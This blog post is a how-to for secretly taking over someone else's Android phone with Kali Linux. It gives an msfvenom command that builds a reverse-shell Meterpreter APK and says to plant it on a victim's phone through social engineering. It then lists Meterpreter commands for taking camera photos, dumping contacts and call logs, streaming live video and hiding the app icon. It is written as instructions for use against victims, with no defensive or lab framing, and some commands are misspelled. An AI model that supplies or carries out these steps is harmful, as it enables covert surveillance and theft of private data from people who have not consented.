Tuesday, 5 November 2019

How to Hack any Android Phone by using Kali Linux 2019



First Create a Metasploit Payload by using Kali Linux.


First, we need to create a Metasploit payload or, APK file. Now, open a terminal in Kali Linux and type the command as per as given below


msfvenom -p android/meterpreter/reverse_tcp Lhost= "your IP Address" Lport= "your Port Address" R "here angle bracket"  "file name".apk


After that, you can see that an Apk file will be created. Now, main work is here to send this payload/ Apk file in victim phone. You can use social engineering for that or, find any other way to arrive this Apk file in victim phone and install it there. Whenever you install this Apk file in victim mobile then the phone will take permission to install this Apk file in mobile allow it and install this payload.



Now, the next step is to write "msfconsole" in terminal it takes a few seconds after that again put your Lhost and Lport as mentioned above. After that, a meterpreter session will be created. Now, you are ready to get information about victim mobile phone like call details, voice recording, SMS, contact details, system information,  victim locations, camera snaps, etc. In this way, you will able to hack any android phone by using Kali Linux.

I will list of Some Commands which will help you to know more and more details about victim mobile phone.

To take a photo you can get pics from the victim mobile both of camera front and back for front type " webcam_snap1 " and for second type " webcam_snap2

To export all contact " dumo_contacts "

To know call logs " dump_calllog

You can hide your Apk file in victim mobile through this command " hide_app_icon "

To see live video type " webcam_stream


BY: ATHARV HATWAR

0 Comments

Post a Comment